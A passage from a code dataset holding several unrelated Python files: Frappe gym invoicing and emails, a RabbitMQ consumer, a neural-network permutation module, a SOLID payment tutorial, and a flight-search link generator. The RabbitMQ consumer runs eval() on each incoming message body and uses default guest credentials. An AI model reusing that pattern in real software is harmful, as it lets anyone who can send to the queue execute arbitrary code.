default_no_of_days_for_due_date = frappe.get_doc(\"Gym Settings\").default_no_of_days_for_due_date\n si_doc.due_date = add_days(si_doc.posting_date, default_no_of_days_for_due_date)\n\n default_item_key = \"default_membership_item\" if self.doctype == \"Gym Membership\" else \"default_subscription_item\"\n if default_item_key ==\"default_membership_item\":\n default_item = frappe.get_doc(\"Gym Settings\").default_membership_item\n else:\n default_item = frappe.get_doc(\"Gym Settings\").default_subscription_item\n\n if not default_item:\n frappe.throw(_(\"Please Define {} Item in {}\".format(unscrub(default_item_key), frappe.bold(get_link_to_form(\"Gym Settings\",\"Gym Settings\")))))\n \n si_doc.append('items', {\n 'item_code': default_item,\n 'qty': 1,\n 'rate': self.amount\n })\n\n si_doc.save(ignore_permissions=True)\n si_doc.submit()\n self.db_set('sales_invoice', si_doc.name)\n except Exception as e:\n frappe.logger(\"gym\").exception(e)\n\ndef send_weekly_summary_mails():\n try:\n def header(gym_member, start_date, end_date):\n return f\"\"\"Hey, {gym_member}

\n Here is your Weekly Summary for Gym Classes between {format_date(start_date)} and {format_date(end_date)}
\n \n \n \n \n \n \n \n \"\"\"\n\n\n def table(class_type, date):\n date = format_date(date)\n return \"\"\"\n \n \n \n \"\"\".format(class_type, date)\n\n def footer():\n return \"\"\"
TypeDate
{} {}


\n Thank you for your active participation and inputs, We hope you enjoyed the experience.\n \"\"\"\n \n start_date = add_days(today(), -7)\n end_date = today()\n class_booking_data = frappe.db.get_all(\"Gym Class Booking\", \n {\"docstatus\": 1, \"date\": [\"between\", (start_date, end_date)]},\n [\"class_type\", \"gym_member\", \"date\"], order_by= \"date asc\")\n\n gym_member_dict = {}\n for row in class_booking_data:\n if row.gym_member not in gym_member_dict:\n gym_member_dict[row.gym_member] = [row]\n else:\n gym_member_dict[row.gym_member].append(row)\n \n for gym_member, details in iteritems(gym_member_dict):\n table_content = ''\n for row in details:\n table_content += table(row.class_type, row.date)\n\n message = header(gym_member, start_date, end_date) + '' + table_content + '' + footer()\n recipient = frappe.db.get_value(\"Gym Member\", gym_member, \"email_id\")\n try:\n frappe.sendmail(\n recipients= recipient,\n subject = 'Weekly Summary of Gym Classes',\n message = message,\n )\n\n make_communication(\n content= message,\n subject= 'Weekly Summary of Gym Classes',\n recipients= recipient,\n communication_medium=\"Email\",\n send_email=False,\n communication_type=\"Automated Message\",\n )\n\n except Exception as e:\n frappe.logger(\"gym\").exception(e)\n frappe.log_error(\"GYM Mail Sending Issue\", frappe.get_traceback())\n continue\n except Exception as e:\n frappe.logger(\"gym\").exception(e)\n frappe.log_error(\"GYM Mail Sending Issue\", frappe.get_traceback())","repo_name":"Vikas8600/gym-management-system","sub_path":"gym_management_system/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39822903671","text":"import pika\n\n# 建立连接\nuserx = pika.PlainCredentials(\"guest\", \"guest\")\nconn = pika.BlockingConnection(pika.ConnectionParameters(\"127.0.0.1\", 5672, '/', credentials=userx))\n\n# 开辟管道\nchannelx = conn.channel()\n\n# 声明队列,参数为队列名\nchannelx.queue_declare(queue=\"modelProcess\")\n\n\n# 消息处理函数,执行完成才说明接收完成,此时才可以接收下一条,串行\ndef dongcallbackfun(v1, v2, v3, bodyx):\n messageJson = eval(bodyx.decode('utf-8'))\n print(\"得到的数据为:\", messageJson)\n print(type(messageJson))\n\n\n# 接收准备\nchannelx.basic_consume(\n \"modelProcess\", # 队列名\n dongcallbackfun, # 收到消息的回调函数\n True, # 是否发送消息确认\n )\nprint(\"-------- 开始接收数据 -----------\")\n\n# 开始接收消息\nchannelx.start_consuming()\n","repo_name":"ljjwyn/algorithm_python","sub_path":"rabbitmq/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11111070452","text":"import torch\nfrom copy import deepcopy\nfrom .sinkhorn import Sinkhorn, matching\nfrom .graph.auto_graph import solve_graph\n\n\nclass ReparamNet(torch.nn.Module):\n def __init__(self, model, permutation_type=\"mat_mul\"):\n super().__init__()\n _permutation_types = [\"mat_mul\", \"broadcast\"]\n assert (\n permutation_type in _permutation_types\n ), \"Permutation type must be in {}\".format(_permutation_types)\n self.permutation_type = permutation_type\n self.output = deepcopy(model)\n self.model = deepcopy(model)\n for p1, p2 in zip(self.model.parameters(), self.output.parameters()):\n p1.requires_grad = False\n p2.requires_grad = False\n\n def set_model(self, model):\n self.model = deepcopy(model)\n for p1 in self.model.parameters():\n p1.requires_grad = False\n\n def training_rebasin(self, P):\n for (name, p1), p2 in zip(\n self.output.named_parameters(), self.model.parameters()\n ):\n if (\n name not in self.map_param_index\n or name not in self.map_prev_param_index\n ):\n continue\n i = self.perm_dict[self.map_param_index[name]]\n j = (\n self.perm_dict[self.map_prev_param_index[name]]\n if self.map_prev_param_index[name] is not None\n else None\n )\n\n if \"bias\" in name[-4:]:\n if i is not None:\n p1.copy_(P[i] @ p2)\n else:\n continue\n\n # batchnorm\n elif len(p1.shape) == 1:\n if i is not None:\n p1.copy_((P[i] @ p2.view(p1.shape[0], -1)).view(p2.shape))\n\n # mlp / cnn\n elif \"weight\" in name[-6:]:\n if i is not None and j is None:\n p1.copy_((P[i] @ p2.view(P[i].shape[0], -1)).view(p2.shape))\n\n if i is not None and j is not None:\n p1.copy_(\n (\n P[j].view(1, *P[j].shape)\n @ (P[i] @ p2.view(P[i].shape[0], -1)).view(\n p2.shape[0], P[j].shape[0], -1\n )\n ).view(p2.shape)\n )\n\n if i is None and j is not None:\n p1.copy_(\n (\n P[j].view(1, *P[j].shape)\n @ p2.view(p2.shape[0], P[j].shape[0], -1)\n ).view(p2.shape)\n )\n\n def update_batchnorm(self, model):\n for m1, m2 in zip(self.model.modules(), model.modules()):\n if \"BatchNorm\" in str(type(m2)):\n if m2.running_mean is None:\n m1.running_mean = None\n else:\n m1.running_mean.copy_(m2.running_mean)\n if m2.running_var is None:\n m1.running_var = None\n m1.track_running_stats = False\n else:\n m1.running_var.copy_(m2.running_var)\n\n def permute_batchnorm(self, P):\n for (name, m1), m2 in zip(self.output.named_modules(), self.model.modules()):\n if \"BatchNorm\" in str(type(m2)):\n if name + \".weight\" in self.map_param_index:\n if m2.running_mean is None and m2.running_var is None:\n continue\n i = self.perm_dict[self.map_param_index[name + \".weight\"]]\n index = (\n torch.argmax(P[i], dim=1)\n if i is not None\n else torch.arange(m2.running_mean.shape[0])\n )\n m1.running_mean.copy_(m2.running_mean[index, ...])\n m1.running_var.copy_(m2.running_var[index, ...])\n\n def eval_rebasin(self, P):\n for (name, p1), p2 in zip(\n self.output.named_parameters(), self.model.parameters()\n ):\n if (\n name not in self.map_param_index\n or name not in self.map_prev_param_index\n ):\n continue\n i = self.perm_dict[self.map_param_index[name]]\n j = (\n self.perm_dict[self.map_prev_param_index[name]]\n if self.map_prev_param_index[name] is not None\n else None\n )\n\n if \"bias\" in name[-4:]:\n if i is not None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data[index, ...])\n else:\n continue\n\n # batchnorm\n elif len(p1.shape) == 1:\n if i is not None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data[index, ...])\n\n # mlp / cnn\n elif \"weight\" in name[-6:]:\n if i is not None and j is None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data.view(P[i].shape[0], -1)[index, ...].view(p2.shape))\n\n if i is not None and j is not None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data[index, ...])\n index = torch.argmax(P[j], dim=1)\n p1.copy_(p1.data[:, index, ...])\n\n if i is None and j is not None:\n index = torch.argmax(P[j], dim=1)\n p1.copy_(\n (\n p2.data.view(p2.shape[0], P[j].shape[0], -1)[:, index, ...]\n ).view(p2.shape)\n )\n\n def forward(self, P):\n for p1, p2 in zip(self.output.parameters(), self.model.parameters()):\n p1.data = p2.data.clone()\n\n for p1 in self.output.parameters():\n p1._grad_fn = None\n\n if self.training or self.permutation_type == \"mat_mul\":\n self.training_rebasin(P)\n else:\n self.eval_rebasin(P)\n\n self.permute_batchnorm(P)\n\n return self.output\n\n def to(self, device):\n self.output.to(device)\n self.model.to(device)\n\n return self\n\n\nclass RebasinNet(torch.nn.Module):\n def __init__(\n self,\n model,\n input_shape,\n remove_nodes=list(),\n l=1.0,\n tau=1.0,\n n_iter=20,\n operator=\"implicit\",\n permutation_type=\"mat_mul\",\n ):\n super().__init__()\n assert operator in [\n \"implicit\",\n ], \"Operator must be either `implicit`\"\n\n self.reparamnet = ReparamNet(model, permutation_type=permutation_type)\n self.param_precision = next(iter(model.parameters())).data.dtype\n input = torch.randn(input_shape, dtype=self.param_precision)\n perm_dict, n_perm, permutation_g, parameter_map = solve_graph(\n model, input, remove_nodes=remove_nodes\n )\n\n P_sizes = [None] * n_perm\n map_param_index = dict()\n map_prev_param_index = dict()\n nodes = list(permutation_g.nodes.keys())\n for name, p in model.named_parameters():\n if parameter_map[name] not in nodes:\n continue\n else:\n map_param_index[name] = permutation_g.naming[parameter_map[name]]\n parents = permutation_g.parents(parameter_map[name])\n map_prev_param_index[name] = (\n None if len(parents) == 0 else permutation_g.naming[parents[0]]\n )\n\n if \"weight\" in name[-6:]:\n if len(p.shape) == 1: # batchnorm\n pass # no permutation : bn is \"part\" for the previous one like biais\n else:\n if (\n map_param_index[name] is not None\n and perm_dict[map_param_index[name]] is not None\n ):\n perm_index = perm_dict[map_param_index[name]]\n P_sizes[perm_index] = (p.shape[0], p.shape[0])\n\n self.reparamnet.map_param_index = map_param_index\n self.reparamnet.map_prev_param_index = map_prev_param_index\n self.reparamnet.perm_dict = perm_dict\n\n self.p = torch.nn.ParameterList(\n [\n torch.nn.Parameter(\n torch.eye(ps[0], dtype=self.param_precision)\n + torch.randn(ps, dtype=self.param_precision) * 0.1,\n requires_grad=True,\n )\n if ps is not None\n else None\n for ps in P_sizes\n ]\n )\n\n self.l = l\n self.tau = tau\n self.n_iter = n_iter\n self.operator = operator\n\n def update_batchnorm(self, model):\n self.reparamnet.update_batchnorm(model)\n\n def random_init(self):\n for p in self.p:\n ci = torch.randperm(p.shape[0])\n p.data = (torch.eye(p.shape[0])[ci, :]).to(p.data.device)\n\n def identity_init(self):\n for p in self.p:\n p.data = torch.eye(p.shape[0]).to(p.data.device)\n\n def eval(self):\n self.reparamnet.eval()\n return super().eval()\n\n def train(self, mode: bool = True):\n self.reparamnet.train(mode)\n return super().train(mode)\n\n def forward(self, x=None):\n\n if self.training:\n gk = list()\n for i in range(len(self.p)):\n if self.operator == \"implicit\":\n sk = Sinkhorn.apply(\n -self.p[i] * self.l,\n torch.ones((self.p[i].shape[0])).to(self.p[0].device),\n torch.ones((self.p[i].shape[1])).to(self.p[0].device),\n self.n_iter,\n self.tau,\n )\n\n gk.append(sk)\n\n else:\n gk = [\n matching(p.cpu().detach().numpy())\n .to(self.param_precision)\n .to(self.p[0].device)\n for p in self.p\n ]\n\n m = self.reparamnet(gk)\n if x is not None and x.ndim == 1:\n x.unsqueeze_(0)\n\n if x is not None:\n return m(x)\n\n return m\n\n def zero_grad(self, set_to_none: bool = False) -> None:\n self.reparamnet.output.zero_grad(set_to_none)\n return super().zero_grad(set_to_none)\n\n def parameters(self, recurse: bool = True):\n return self.p.parameters(recurse)\n\n def to(self, device):\n for p in self.p:\n if p is not None:\n p.data = p.data.to(device)\n\n return self\n","repo_name":"fagp/sinkhorn-rebasin","sub_path":"rebasin/rebasinnet/symmnet.py","file_name":"symmnet.py","file_ext":"py","file_size_in_byte":10697,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"22104742605","text":"import os\nfrom configparser import ConfigParser\n\nimport common.env_utils\nimport common.network.constants\nimport common.supervisor.utils\nfrom common.processing_node.queue_consumer.queue_consumer import QueueConsumer\n\nfrom common.rabbitmq.queue import Queue\nfrom common.rabbitmq.exchange_writer import ExchangeWriter\nfrom common.processing_node.queue_consumer.output_processor.forwarding_output_processor import ForwardingOutputProcessor\nfrom common.processing_node.stateless_node import StatelessNode\nfrom common.processing_node.queue_consumer.eof_handler import EOFHandler\n\nfrom weather_filter_process_input import weather_filter_process_input\n\n\ndef read_config():\n config = ConfigParser(os.environ)\n config.read(\"config.ini\")\n\n return config[\"DEFAULT\"]\n\n\ndef main():\n config = common.env_utils.read_config()\n\n queue_bindings = common.env_utils.parse_queue_bindings(config['UNFILTERED_WEATHER_QUEUE_BINDINGS'])\n input_queue_reader = Queue(\n hostname=config['RABBITMQ_HOSTNAME'],\n name=config['UNFILTERED_WEATHER_QUEUE_NAME'],\n bindings=queue_bindings\n )\n\n output_exchange_writer = ExchangeWriter(\n hostname=config['RABBITMQ_HOSTNAME'],\n exchange_name=config['FILTERED_WEATHER_EXCHANGE_NAME'],\n queue_name=config['FILTERED_WEATHER_QUEUE_NAME']\n )\n\n forwarding_output_processor = ForwardingOutputProcessor(\n n_output_peers=1,\n output_exchange_writer=output_exchange_writer,\n output_eof=common.network.constants.WEATHER_END_ALL,\n forward_with_routing_key=True\n )\n\n queue_consumer = QueueConsumer(\n process_input=weather_filter_process_input,\n input_eofs=[common.network.constants.WEATHER_END_ALL],\n n_input_peers=1,\n input_queue=input_queue_reader,\n output_processor=forwarding_output_processor,\n eof_handler=EOFHandler(\".eof\")\n )\n\n processing_node = StatelessNode(\n queue_consumer=queue_consumer,\n supervisor_process=common.supervisor.utils.create_from_config(config)\n )\n\n processing_node.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PBrrtrn/PBrrtrn-sistemas-distribuidos-tp2-98446","sub_path":"backend/weather_filter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40939885822","text":"joy_hp = 100\njoy_ack = 10\njoy_def = 5\njoy_level = 1\njoy_exp = 0\n\njoy_exp += 100\n\njoy_level += 1\njoy_hp += 10\njoy_ack += 2\njoy_def += 1\n\njoy_exp += 230\n\n\n################3\n\nclass Role:\n\n def __init__(self):\n self.hp = 100\n self.ack = 10\n self.def_ = 5\n self.level = 1\n self.exp = 0\n \n def add_exp(self, exp):\n self.exp += exp\n while self.exp >= 100:\n self.level_up()\n \n def level_up(self):\n self.hp += 10\n self.ack += 2\n self.def_ += 1\n self.exp -= 100\n\n\njoy = Role()\njoy.add_exp(380)\nprint(joy.hp)\n","repo_name":"HzyAlex/CS101","sub_path":"nba website/website/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9885885741","text":"import ifcopenshell\nimport ifcopenshell.util.unit\n\n\nclass Usecase:\n def __init__(self, file, **settings):\n self.file = file\n self.settings = {\"name\": \"foot\", \"conversion_offset\": None}\n for key, value in settings.items():\n self.settings[key] = value\n\n def execute(self):\n unit_type = ifcopenshell.util.unit.imperial_types.get(self.settings[\"name\"], \"USERDEFINED\")\n dimensions = ifcopenshell.util.unit.named_dimensions[unit_type]\n exponents = self.file.createIfcDimensionalExponents(*dimensions)\n si_name = ifcopenshell.util.unit.si_type_names[unit_type]\n si_unit = self.file.createIfcSIUnit(UnitType=unit_type, Name=si_name)\n\n conversion_real = ifcopenshell.util.unit.si_conversions.get(self.settings[\"name\"], 1)\n value_component = self.file.create_entity(\"IfcReal\", **{\"wrappedValue\": conversion_real})\n conversion_factor = self.file.createIfcMeasureWithUnit(value_component, si_unit)\n\n conversion_offset = self.settings[\"conversion_offset\"]\n if not conversion_offset:\n conversion_offset = ifcopenshell.util.unit.si_offsets.get(self.settings[\"name\"], 0)\n\n if conversion_offset:\n return self.file.createIfcConversionBasedUnitWithOffset(\n exponents, unit_type, self.settings[\"name\"], conversion_factor, conversion_offset,\n )\n return self.file.createIfcConversionBasedUnit(\n exponents, unit_type, self.settings[\"name\"], conversion_factor\n )\n","repo_name":"vulevukusej/BlenderBIM","sub_path":"standalone scripts for ifcopenshell/ifcopenshell/api/unit/add_conversion_based_unit.py","file_name":"add_conversion_based_unit.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"18192640710","text":"#sale system\r\nfrom abc import ABC, abstractmethod\r\n\r\nclass Order:\r\n items = []\r\n quantities = []\r\n prices = []\r\n status = \"Open\"\r\n\r\n def add_item(self, name, quantity, price):\r\n self.items.append(name)\r\n self.quantities.append(quantity)\r\n self.prices.append(price)\r\n\r\n def total_price(self):\r\n total = 0\r\n for i in range(len(self.prices)):\r\n total += self.quantities[i] * self.prices[i]\r\n return total\r\n \r\n ''' (1 -> SRP)\r\n Sem Single responsability, a classe order fica responsável pela\r\n gerência do pedido (adicionar item e calcular o preço, que são \r\n realmente responsabilidades da classe), mas também fica responsável\r\n pelo pagamento, o que fere o SRP\r\n def pay(self, payment_type, security_code):\r\n if payment_type == \"debit\":\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n self.status = \"paid\"\r\n elif payment_type == \"credit\":\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n self.status = \"paid\"\r\n else:\r\n raise Exception(f\"Unknown payment method: {payment_type}\")\r\n '''\r\n\r\n#(1 -> SRP)\r\n#Para adequar ao SRP é necessário criar uma nova classe que cuide do pagamento\r\n'''\r\nclass PaymentProcessor:\r\n def pay_credit(self, order, security_code):\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code {security_code}\")\r\n order.status = \"paid\" #uma vez que é preciso passar a order para ser verificada\r\n #já que a classe foi \"quebrada\" para atender o SRP\r\n\r\n def pay_debit(self, order, security_code):\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code {security_code}\")\r\n order.status = \"paid\" #uma vez que é preciso passar a order para ser verificada\r\n #já que a classe foi \"quebrada\" para atender o SRP\r\n'''\r\n\r\n#(2 -> Open/Closed) \r\n'''\r\nBasicamente, criarmos uma classe abstrata que é aberta para extensão,\r\nporém fechada para modificação, ou seja, podemos usar essa classe para\r\ncriar novas classes \"mais específicas\" com base na classe abstrata\r\n'''\r\n#classe aberta que define a base dos pagamentos genéricos\r\n'''\r\nclass PaymentProcessor(ABC):\r\n @abstractmethod\r\n def pay(self, order, security_code):\r\n pass\r\n\r\nclass DebitPaymentProcessor(PaymentProcessor):\r\n def pay(self, order, security_code):\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n order.status = \"paid\"\r\n\r\nclass CreditPaymentProcessor(PaymentProcessor):\r\n def pay(self, order, security_code):\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n order.status = \"paid\"\r\n'''\r\n#(3 -> Liskov substitytion principle)\r\n'''\r\nAqui, retiramos o security_code, pois uma das funções de pagamento/\r\nprocessor de pagamento, não precisava desse atributo específico, mas\r\nsim de um substituto pra ele.\r\nNesse caso, o Liskov diz que não é necessário herdar tudo. Podemos apenas\r\ninicializar o que precisamos dentro dos processors, exemplo: se credit e debit\r\nprocessors, precisam do security code, basta inicializarmos dentro deles. E\r\ncomo o pay pal precisa de um e-mail, inicializamos, dentro do processor de pay pal,\r\nassimm, cada um fica com sua particularidade, sem ser obrigado pela classe na\r\nqual estão herdando.\r\n'''\r\n\r\n# (5 -> Dependency Inversion)\r\n'''\r\nSignifica dizer que queremos que nossas classes dependam de classes abstratas\r\nnão de classes ou subclasses concretas (no exemplo, temos DebitPaymentProcessor\r\ne PayPalPaymentProcessor dependendo da classe concreta SMSAuth), por isso criaremos\r\numa classe abstrata.\r\nCriando a classe abstrata abaixo, podemos criar outras classes de autorização\r\n'''\r\nclass Authorizer(ABC):\r\n @abstractmethod\r\n def is_authorized(self) -> bool:\r\n pass\r\n\r\n#(4 -> Interface segregation utilizando composição)\r\nclass SMSAuth(Authorizer):\r\n authorized = False\r\n\r\n def verify_code(self, code):\r\n #Aqui está autorizando tudo por padrão\r\n print(f\"Verifying code {code}\")\r\n self.authorized = True\r\n \r\n #jeito mais clean de alterar uma variável\r\n def is_authorized(self) -> bool:\r\n return self.authorized\r\n\r\nclass PaymentProcessor(ABC):\r\n @abstractmethod\r\n #tirarmos o security_code dos argumentos obrigatórios\r\n def pay(self, order):\r\n pass\r\n\r\n '''\r\n (4 -> Interface Segregation)\r\n Aqui poderíamos pensar de colocar mais uma abstração dentro\r\n da interface geral, porém isso feriria a segragação de interfaces\r\n @abstractmethod\r\n def auth_sms(self, code):\r\n pass\r\n '''\r\n\r\n#(4 -> Interface segregation)\r\n'''\r\naqui criamos uma interface que faz envio de sms de autenticação\r\nde dois fatores, mas nem todas as classes de pagamento suportam\r\nessa funcionalidade, então, basta criarmos um \"código adicional\"\r\npara a classe abstrata anterior, que forneça a possibilidade de\r\nenviar sms. E assim, os processors que suportarem o envio de sms\r\nsimplesmente podem \"herdar\" diretamente dessa interface\r\n'''\r\n'''\r\nÉ uma forma de se separar as interfaces\r\nclass PaymentProcessor_SMS(PaymentProcessor):\r\n @abstractmethod\r\n def auth_sms(self, code):\r\n pass\r\n'''\r\n\r\n#(4 -> Interface segregation utilizando composição)\r\nclass DebitPaymentProcessor(PaymentProcessor):\r\n# (4 -> Interface segregation)\r\n#class DebitPaymentProcessor(PaymentProcessor_SMS): #Já que suporta envio de sms\r\n# (3 -> Liskov) class DebitPaymentProcessor(PaymentProcessor):\r\n #aqui inicializa o security_code como \"particularidade\" dessa classe\r\n #sem que seja uma obrigação da classe mãe\r\n #(5 -> Dependency inversion, agora, passamos a classe abstrata Authorizer)\r\n def __init__(self, security_code, authorizer: Authorizer):\r\n #(4 -> Passávamos a classe concreta SMSAuth)\r\n #def __init__(self, security_code, authorizer: SMSAuth):\r\n self.authorizer = authorizer #aqui importa a autorização de SMSAuth\r\n self.security_code = security_code\r\n\r\n def pay(self, order):\r\n if not self.authorizer.is_authorized():\r\n raise Exception(\"Not Authorized\")\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code: {self.security_code}\")\r\n order.status = \"paid\"\r\n\r\nclass CreditPaymentProcessor(PaymentProcessor):\r\n #aqui inicializa o security_code como \"particularidade\" dessa classe\r\n #sem que seja uma obrigação da classe mãe\r\n def __init__(self, security_code):\r\n self.security_code = security_code\r\n\r\n def pay(self, order):\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code: {self.security_code}\")\r\n order.status = \"paid\"\r\n\r\nclass PayPalPaymentProcessor(PaymentProcessor): #Já que suporta envio de sms\r\n #aqui inicializa o email_address como \"particularidade\" dessa classe\r\n #sem que seja uma obrigação da classe mãe\r\n def __init__(self, email_address, authorizer: SMSAuth):\r\n self.authorizer = authorizer #aqui importa a autorização de SMSAuth\r\n self.email_address = email_address\r\n\r\n def pay(self, order):\r\n if not self.authorizer.is_authorized():\r\n raise Exception(\"Not Authorized\")\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying email address: {self.email_address}\")\r\n order.status = \"paid\"\r\n\r\norder = Order()\r\norder.add_item(\"Keyboard\", 1, 50);\r\norder.add_item(\"SSD\", 1, 150);\r\norder.add_item(\"USB cable\", 2, 5);\r\n\r\nprint(order.total_price())\r\n#processor = PaymentProcessor() # (1 -> SRP) aqui criamos um processador de pagamentos\r\n# (0) order.pay(\"debit\", \"9099909877\"); -> Vira obsoleto, visto que agora, pagamos com o processor\r\n#(4 -> Interface Segregation utilizando composição)\r\nauthorizer = SMSAuth() \r\nprocessor = DebitPaymentProcessor(\"9099909877\", authorizer) #authorizer que é o autenticador do código sms recebido\r\nauthorizer.verify_code(23234132)\r\n# (3 -> Liskov)\r\n#processor = PayPalPaymentProcessor(\"csk@email.com\") #passa o argumento email address para o PayPalProcessor\r\nprocessor.pay(order) #aqui apenas paga a order\r\n\r\n# (2 -> SRP + OpenClosed)\r\n'''\r\nprocessor = DebitPaymentProcessor() #aqui alteramos apenas a classe que será responsável pelo pagamento\r\nprocessor.pay(order, \"9099909877\") #pay pelo fato de no processor, ser definido o método de pagamento\r\n'''\r\n#(1 -> SRP)\r\n#processor.pay_debit(order, \"9099909877\") # -> Passamos a order pois agora é necessário\r\n\r\n\r\n#Muitas vezes utilzar composição ao invés de herança pode ser bem melhor","repo_name":"p3dru/python","sub_path":"solid.py","file_name":"solid.py","file_ext":"py","file_size_in_byte":8790,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22896081500","text":"import datetime\nimport sys, getopt\nfrom export_csv import export_list_csv\n\ndef diff_days(a,b):\n '''\n Returns the diference of days\n :param a: like \"2017-12-30\"\n :param b: same\n :return: difference of days as int\n '''\n a = datetime.datetime.strptime(a, \"%Y-%m-%d\")\n b = datetime.datetime.strptime(b, \"%Y-%m-%d\")\n return int((b - a).days)\n\ndef clean_dates(all_dates):\n return all_dates\n\ndef gen_dates_same_month(month, year):\n '''\n :param month: month to generate dates: ie \"03\" is march\n :return: something like [['2017-04-04', '2017-04-05'], ['2017-04-04', '2017-04-12']]\n '''\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n all_dates = []\n date = year + \"-\" + month + \"-04\"\n #dif = diff_days(date, current_date)\n if diff_days(date, current_date) <= 0: # check that today is before the departure date\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 5)]\n #if dif > 0 and dif <= 2:\n\n date = year + \"-\" + month + \"-11\"\n if diff_days(date, current_date) <= 0:\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 4)]\n\n date = year + \"-\" + month + \"-18\"\n if diff_days(date, current_date) <= 0:\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 3)]\n\n date = year + \"-\" + month + \"-25\"\n if diff_days(date, current_date) <= 0:\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 2)]\n\n return all_dates\n\ndef gen_dates_different_month(month_departure, month_return, year_departure, year_return):\n\n '''\n Generates a list of list of dates\n :param month_departure: ie \"03\"\n :param month_return: ie \"04\"\n :return: something like [['2017-03-04', '2017-04-04'], ['2017-04-04', '2017-05-11']]\n '''\n all_dates = []\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n date_departure_base = year_departure + \"-\" + month_departure + \"-04\"\n for i in range(0, 5):\n date_departure = datetime.datetime.strptime(date_departure_base, \"%Y-%m-%d\") + datetime.timedelta(days=i * 7)\n date_return_base = year_return + \"-\" + month_return + \"-04\"\n date_departure_full = date_departure.strftime(\"%Y-%m-%d\")\n if diff_days(date_departure_full, current_date) <= 0: # check that today is before the departure date\n all_dates += [[date_departure_full,(datetime.datetime.strptime(date_return_base, \"%Y-%m-%d\")\n + datetime.timedelta(days=x * 7)).strftime(\"%Y-%m-%d\")] for x in range(0, 5)]\n return all_dates\n\ndef gen_dates_no_return(month_departure, year_departure):\n all_dates = []\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n date_departure_base = year_departure + \"-\" + month_departure + \"-04\"\n for i in range(0, 5):\n date_departure = datetime.datetime.strptime(date_departure_base, \"%Y-%m-%d\") + datetime.timedelta(days=i * 7)\n date_departure_full = date_departure.strftime(\"%Y-%m-%d\")\n if diff_days(date_departure_full, current_date) <= 0: # check that today is before the departure date\n all_dates += [[date_departure_full, \"no-return\"]]\n return all_dates\n\ndef gen_dates(month_departure, month_return, year_departure, year_return):\n '''\n generates the list of lists for departure and return dates\n :param month_departure: i.e \"03\" for march\n :param month_return: i.e \"06\" for june\n they have to be str of two characters\n :return: list of lists with possible departure dates and return dates in each element\n i.e [['2017-03-04', '2017-04-04'], ['2017-04-04', '2017-05-11']]\n '''\n if month_departure == month_return and year_departure == year_return:\n return gen_dates_same_month(month_departure, year_departure)\n if month_return == \"00\":\n return gen_dates_no_return(month_departure, year_departure)\n else:\n return gen_dates_different_month(month_departure, month_return, year_departure, year_return)\n\n\ndef gen_links(dates, airport_departure, airport_arrival, extensions = [\"es\"]):\n '''\n creates the links to scrape in the form:\n https://www.kayak.es/flights/FCO-BKK,KUL/2017-04-11-flexible/2017-07-02-flexible\n :param dates: list of lists of two elements with departure date and return date in the following form:\n [[\"2017-02-26\",\"2017-05-30\"], [\"2017-02-26\",\"2017-06-20\"]]\n :param airport_departure: the code of the departure airport: i.e \"FCO\" or \"LHR\".\n Also it admits multiple airports at the same time: i.e \"FCO,LHR\"\n :param airport_arrival: code of the arrival airport i.e \"BKK\" or \"KUL\" or \"BKK,KUL\"\n :param extensions: list of the extensions of the kayak domains: i.e [\"es\", \"co.uk\", \"it\", \"se\"]\n :return: the list of links generated\n '''\n links = []\n for extension in extensions:\n for date in dates:\n link = \"https://www.kayak.\" + extension + \"/flights/\"+ airport_departure + \"-\" + airport_arrival + \"/\" + date[0] + \"-flexible/\" + date[1] + \"-flexible\"\n if \"no-return\" in link:\n links.append(link[:-19])\n else:\n links.append(link)\n return links\n\n\ndef main(argv):\n month_departure = ''\n month_return = ''\n year_departure = ''\n year_return = ''\n airport_departure = ''\n airport_arrival = ''\n extension = ''\n name=''\n try:\n opts, args = 